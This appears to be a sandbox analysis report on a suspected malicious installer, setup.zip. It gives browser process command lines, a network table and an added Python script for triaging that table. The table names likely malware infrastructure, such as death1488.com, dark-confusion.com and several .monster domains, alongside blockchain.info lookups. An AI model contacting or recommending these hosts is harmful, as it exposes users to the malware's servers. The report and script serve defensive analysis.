"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5284 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=5044 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5204 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --mojo-platform-channel-handle=4996 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=5824 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=5824 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=6108 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=5416 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=6472 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=6476 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=6084 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x238,0x23c,0x240,0x234,0x248,0x7ff8a4342e98,0x7ff8a4342ea4,0x7ff8a4342eb0
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2288 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2324 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=3064 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --extension-process --renderer-sub-type=extension --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3268 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4768 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4768 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=3892 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4420 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --mojo-platform-channel-handle=5140 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5180 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5536 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5528 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5560 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 21.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| GB | 142.250.179.234:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | 234.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 179.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 12.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | thecurl.monster | udp |
| US | 172.67.176.123:80 | thecurl.monster | tcp |
| US | 172.67.176.123:443 | thecurl.monster | tcp |
| US | 8.8.8.8:53 | 123.176.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | death1488.com | udp |
| US | 172.67.151.174:80 | death1488.com | tcp |
| US | 8.8.8.8:53 | 174.151.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | the.earth.li | udp |
| US | 8.8.8.8:53 | iigggkkl.monster | udp |
| US | 188.114.97.2:443 | iigggkkl.monster | tcp |
| GB | 93.93.131.124:443 | the.earth.li | tcp |
| US | 8.8.8.8:53 | 2.97.114.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.131.93.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.13.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raur94.com | udp |
| US | 104.21.68.134:80 | raur94.com | tcp |
| US | 104.21.68.134:443 | raur94.com | tcp |
| US | 8.8.8.8:53 | 134.68.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | checkass.monster | udp |
| US | 104.21.2.229:443 | checkass.monster | tcp |
| US | 8.8.8.8:53 | 229.2.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | update.googleapis.com | udp |
| US | 8.8.8.8:53 | update.googleapis.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | business.bing.com | udp |
| US | 8.8.8.8:53 | business.bing.com | udp |
| US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp |
| GB | 142.250.180.3:443 | update.googleapis.com | tcp |
| US | 13.107.6.158:443 | business.bing.com | tcp |
| GB | 142.250.180.3:443 | update.googleapis.com | tcp |
| US | 13.107.6.158:443 | business.bing.com | tcp |
| US | 13.107.6.158:443 | business.bing.com | tcp |
| US | 8.8.8.8:53 | 10.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| GB | 2.17.5.133:443 | www.microsoft.com | tcp |
| GB | 51.11.108.188:443 | nav-edge.smartscreen.microsoft.com | tcp |
| GB | 51.11.108.188:443 | nav-edge.smartscreen.microsoft.com | tcp |
| GB | 51.11.108.188:443 | nav-edge.smartscreen.microsoft.com | tcp |
| GB | 2.17.5.133:443 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp |
| IE | 94.245.104.56:443 | api.edgeoffer.microsoft.com | tcp |
| FR | 13.105.221.27:443 | edge-mobile-static.azureedge.net | tcp |
| US | 8.8.8.8:53 | bzib.nelreports.net | udp |
| US | 8.8.8.8:53 | bzib.nelreports.net | udp |
| GB | 88.221.135.81:443 | bzib.nelreports.net | tcp |
| IE | 94.245.104.56:443 | api.edgeoffer.microsoft.com | tcp |
| US | 8.8.8.8:53 | 27.221.105.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| GB | 216.58.201.97:443 | clients2.googleusercontent.com | udp |
| GB | 216.58.201.97:443 | clients2.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | 133.5.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.104.245.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | c.s-microsoft.com | udp |
| US | 8.8.8.8:53 | c.s-microsoft.com | udp |
| US | 8.8.8.8:53 | edgestatic.azureedge.net | udp |
| US | 8.8.8.8:53 | edgestatic.azureedge.net | udp |
| US | 13.107.246.64:443 | edgestatic.azureedge.net | tcp |
| US | 13.107.246.64:443 | edgestatic.azureedge.net | tcp |
| US | 13.107.246.64:443 | edgestatic.azureedge.net | tcp |
| US | 13.107.246.64:443 | edgestatic.azureedge.net | tcp |
| US | 13.107.246.64:443 | edgestatic.azureedge.net | tcp |
| US | 13.107.246.64:443 | edgestatic.azureedge.net | tcp |
| GB | 92.123.128.155:443 | www.bing.com | tcp |
| US | 13.107.246.64:443 | edgestatic.azureedge.net | tcp |
| US | 8.8.8.8:53 | 155.128.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | jspm.dev | udp |
| US | 8.8.8.8:53 | jspm.dev | udp |
| US | 205.234.175.175:443 | jspm.dev | tcp |
| US | 205.234.175.175:443 | jspm.dev | tcp |
| US | 8.8.8.8:53 | 175.175.234.205.in-addr.arpa | udp |
| US | 8.8.8.8:53 | blockchain.info | udp |
| US | 8.8.8.8:53 | blockchain.info | udp |
| US | 104.17.138.37:443 | blockchain.info | tcp |
| US | 8.8.8.8:53 | 37.138.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dark-confusion.com | udp |
| US | 8.8.8.8:53 | dark-confusion.com | udp |
| US | 188.114.96.2:443 | dark-confusion.com | tcp |
| US | 188.114.96.2:443 | dark-confusion.com | tcp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 13.107.246.64:443 | edge-consumer-static.azureedge.net | tcp |
| US | 8.8.8.8:53 | 2.96.114.188.in-addr.arpa | udp |
| US | 188.114.96.2:443 | dark-confusion.com | udp |
| N/A | 224.0.0.251:5353 | N/A | udp |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| GB | 92.123.128.155:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | wcpstatic.microsoft.com | udp |
| US | 8.8.8.8:53 | wcpstatic.microsoft.com | udp |
| US | 8.8.8.8:53 | edgestatic.azureedge.net | udp |
| US | 8.8.8.8:53 | edgestatic.azureedge.net | udp |
| US | 13.107.246.64:443 | wcpstatic.microsoft.com | tcp |
| US | 8.8.8.8:53 | edgestatic.azureedge.net | udp |
| FR | 13.105.221.27:443 | edgestatic.azureedge.net | tcp |
| FR | 13.105.221.27:443 | edgestatic.azureedge.net | tcp |
| FR | 13.105.221.27:443 | edgestatic.azureedge.net | tcp |
| GB | 92.123.128.184:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 184.128.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 92.123.128.184:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | 46.28.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.143.182.52.in-addr.arpa | udp |
| GB | 2.17.5.133:443 | www.microsoft.com | tcp |
| GB | 92.123.128.152:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | 152.128.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 2.17.5.133:443 | www.microsoft.com | tcp |
| GB | 92.123.128.152:443 | www.bing.com | udp |
| US | 172.67.151.174:80 | death1488.com | tcp |
| GB | 93.93.131.124:443 | the.earth.li | tcp |
| US | 172.67.151.174:80 | death1488.com | tcp |
| US | 188.114.97.2:443 | dark-confusion.com | tcp |
| US | 104.21.68.134:80 | raur94.com | tcp |
| US | 104.21.68.134:443 | raur94.com | tcp |
| GB | 2.17.5.133:443 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | death1488.com | udp |
| US | 172.67.151.174:80 | death1488.com | tcp |
| GB | 93.93.131.124:443 | the.earth.li | tcp |
| GB | 93.93.131.124:443 | the.earth.li | tcp |
| US | 172.67.151.174:80 | death1488.com | tcp |
| US | 104.21.68.134:80 | raur94.com | tcp |
| US | 8.8.8.8:53 | iigggkkl.monster | udp |
| US | 104.21.68.134:443 | raur94.com | tcp |
| US | 188.114.97.2:443 | iigggkkl.monster | tcp |
| US | 104.21.68.134:80 | raur94.com | tcp |
| US | 188.114.97.2:443 | iigggkkl.monster | tcp |
| US | 104.21.68.134:443 | raur94.com | tcp |
| GB | 93.93.131.124:443 | the.earth.li | tcp |
| US | 104.21.68.134:80 | raur94.com | tcp |
| US | 188.114.97.2:443 | iigggkkl.monster | tcp |
| US | 104.21.68.134:443 | raur94.com | tcp |
| US | 104.21.2.229:443 | checkass.monster | tcp |
| NL | 89.105.201.188:80 | 89.105.201.188 | tcp |
| US | 8.8.8.8:53 | 188.201.105.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| US | 8.8.8.8:53 | business.bing.com | udp |
| US | 8.8.8.8:53 | business.bing.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| GB | 172.165.69.228:443 | nav-edge.smartscreen.microsoft.com | tcp |
| US | 8.8.8.8:53 | business.bing.com | udp |
| US | 8.8.8.8:53 | business.bing.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| IE | 94.245.104.56:443 | api.edgeoffer.microsoft.com | tcp |
| IE | 94.245.104.56:443 | api.edgeoffer.microsoft.com | tcp |
| US | 8.8.8.8:53 | 42.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.69.165.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | business.bing.com | udp |
| US | 13.107.6.158:443 | business.bing.com | tcp |
| US | 8.8.8.8:53 | bzib.nelreports.net | udp |
| US | 8.8.8.8:53 | bzib.nelreports.net | udp |
| GB | 92.123.128.178:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | bzib.nelreports.net | udp |
| US | 8.8.8.8:53 | bzib.nelreports.net | udp |
| US | 8.8.8.8:53 | 178.128.123.92.in-addr.arpa | udp |
| GB | 88.221.134.17:443 | bzib.nelreports.net | tcp |
| US | 8.8.8.8:53 | 17.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | blockchain.info | udp |
| US | 8.8.8.8:53 | blockchain.info | udp |
| US | 104.17.139.37:443 | blockchain.info | tcp |
| US | 8.8.8.8:53 | 37.139.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dark-confusion.com | udp |
| US | 8.8.8.8:53 | dark-confusion.com | udp |
| US | 188.114.97.2:443 | dark-confusion.com | udp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 13.107.246.64:443 | edge-consumer-static.azureedge.net | tcp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| US | 20.189.173.21:443 | nw-umwatson.events.data.microsoft.com | tcp |
| US | 8.8.8.8:53 | 21.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | blockchain.info | udp |
| US | 8.8.8.8:53 | blockchain.info | udp |
| US | 8.8.8.8:53 | blockchain.info | udp |
| US | 104.17.141.37:443 | blockchain.info | tcp |
| US | 8.8.8.8:53 | dark-confusion.com | udp |
| US | 8.8.8.8:53 | dark-confusion.com | udp |
| US | 172.67.158.229:443 | dark-confusion.com | udp |
| US | 8.8.8.8:53 | 37.141.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.158.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| IE | 94.245.104.56:443 | api.edgeoffer.microsoft.com | tcp |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| GB | 172.165.69.228:443 | nav-edge.smartscreen.microsoft.com | tcp |
| IE | 94.245.104.56:443 | api.edgeoffer.microsoft.com | tcp |
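The table above mixes three kinds of rows: resolver queries to 8.8.8.8 (including a reverse lookup of every peer the sandbox talked to), the browser's own background traffic (Edge update, SmartScreen, Bing, NEL reporting, the Chrome Web Store) and the hosts contacted after the installer ran. The script below is an added example and is not part of the report or of any sandbox tooling. It parses the report's own row layout, drops PTR lookups and multicast, collapses duplicate connections, records udp/443 rows as QUIC rather than resolver traffic, and marks by suffix the domains assumed to be browser telemetry. The sample rows are copied from the table; the suffix list is an assumption for this example, and a suffix match only lowers priority, it does not establish that a contact is benign.

```python
"""Triage the Network table of a sandbox report: fold away resolver and
reverse-lookup noise, collapse duplicate rows, and separate the browser's
own telemetry from hosts that still need an analyst's attention."""
import re
from collections import defaultdict

# Constructed sample: rows copied from the table above, in the report's own
# "| Country | Destination | Domain | Proto |" layout (not the full table).
SAMPLE_ROWS = """
| US | 8.8.8.8:53 | 21.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | thecurl.monster | udp |
| US | 172.67.176.123:80 | thecurl.monster | tcp |
| US | 172.67.176.123:443 | thecurl.monster | tcp |
| US | 172.67.151.174:80 | death1488.com | tcp |
| US | 172.67.151.174:80 | death1488.com | tcp |
| US | 8.8.8.8:53 | c.s-microsoft.com | udp |
| GB | 216.58.201.97:443 | clients2.googleusercontent.com | udp |
| N/A | 224.0.0.251:5353 | N/A | udp |
| NL | 89.105.201.188:80 | 89.105.201.188 | tcp |
| GB | 51.11.108.188:443 | nav-edge.smartscreen.microsoft.com | tcp |
"""

# ASSUMPTION: domain suffixes that Edge and Windows contact on their own
# (update checks, SmartScreen, NEL reports). Illustrative, not taken from
# the report; a match lowers priority, it does not prove a contact benign.
TELEMETRY_SUFFIXES = (
    ".microsoft.com", ".bing.com", ".bing.net", ".azureedge.net",
    ".googleapis.com", ".googleusercontent.com", ".nelreports.net",
)

IPV4 = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")


def parse_rows(text):
    """Yield (ip, port, domain, proto) from pipe-delimited table rows."""
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith("|"):
            continue
        cells = [c.strip() for c in line.strip("|").split("|")]
        if len(cells) != 4 or cells[0] == "Country":
            continue
        _country, dest, domain, proto = cells
        ip, _, port = dest.rpartition(":")
        yield ip, int(port), domain, proto.lower()


def classify(domain, ips):
    if IPV4.fullmatch(domain):
        return "direct-ip"   # connection with no name resolution at all
    if domain.endswith(TELEMETRY_SUFFIXES):
        return "telemetry"
    if not ips:
        return "dns-only"    # name was queried but never connected to
    return "review"


def triage(text):
    """Return {domain: {"ips": [...], "ports": [...], "class": str}}."""
    seen = defaultdict(lambda: {"ips": set(), "ports": set()})
    for ip, port, domain, proto in parse_rows(text):
        if ip.startswith(("224.", "239.")):
            continue                      # mDNS/SSDP multicast: local discovery
        if port == 53 and proto == "udp":
            # Resolver query: the queried name is the only signal, and PTR
            # lookups are just the sandbox resolving its own peers.
            if domain == "N/A" or domain.endswith((".in-addr.arpa", ".ip6.arpa")):
                continue
            _ = seen[domain]              # register the name with no endpoint
            continue
        seen[domain]["ips"].add(ip)
        seen[domain]["ports"].add(f"{proto}/{port}")   # udp/443 is QUIC
    return {
        d: {"ips": sorted(v["ips"]), "ports": sorted(v["ports"]),
            "class": classify(d, v["ips"])}
        for d, v in seen.items()
    }


def review_hosts(text):
    """Domains (or bare IPs) an analyst still has to look at, sorted."""
    return sorted(d for d, v in triage(text).items()
                  if v["class"] in ("review", "direct-ip"))


if __name__ == "__main__":
    for host, info in sorted(triage(SAMPLE_ROWS).items(),
                             key=lambda kv: kv[1]["class"]):
        print(f'{info["class"]:10} {host:40} '
              f'{",".join(info["ips"])} {",".join(info["ports"])}')
```

Run against the full table, the "review" and "direct-ip" classes are what goes into the case notes; the "dns-only" class is worth a second look too, since a name that was queried but never connected to can be a resolution failure or a sinkholed domain.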
Files
C:\Users\Admin\Desktop\x32_x64_installer\setup.zip
| MD5 | 7c58506247a0c7c5554caddff4cbaa79 |
